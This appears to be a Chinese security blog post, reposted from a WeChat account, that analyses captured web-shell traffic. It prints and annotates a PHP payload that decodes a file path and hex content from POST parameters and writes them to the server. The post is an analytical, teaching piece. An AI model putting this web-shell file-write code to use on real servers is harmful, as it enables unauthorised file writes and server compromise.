// 关闭错误显示,避免暴露敏感信息@ini_set("display_errors","0");// 设置脚本执行时间无限制@set_time_limit(0);// 禁用魔术引号(已废弃,仅旧版PHP有效)@set_magic_quotes_runtime(0);// 输出响应开始标记echo("->|");// 解码并获取目标文件路径(z1参数需Base64编码)$f = base64_decode($_POST["z1"]);// 获取待写入的文件内容(z2参数)$c = $_POST["z2"];// 移除内容中的回车和换行符(防止格式干扰)$c = str_replace("r","", $c);$c = str_replace("n","", $c);// 将z2内容按每两个字符分割,并转换为URL编码格式后解码// 例如:输入"616263"会转换为"%61%62%63",解码后为"abc"$buf = "";for($i=0; $i<strlen($c); $i+=2) {$buf .= urldecode("%" . substr($c, $i, 2));}// 尝试将解码后的内容写入目标文件// 使用@抑制错误,成功写入输出1,失败输出0$file = @fopen($f, "w"); // 以写入模式打开文件$result = @fwrite($file, $buf); // 写入内容echo($result ? "1": "0");// 输出响应结束标记echo("|<-");die();z1=/var/www/upload/images/jiaoyi.txtz2=dai zhe chengyi go to jiaoyi!
原文始发于微信公众号(信安一把索):流量分析 - 黑客(解)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论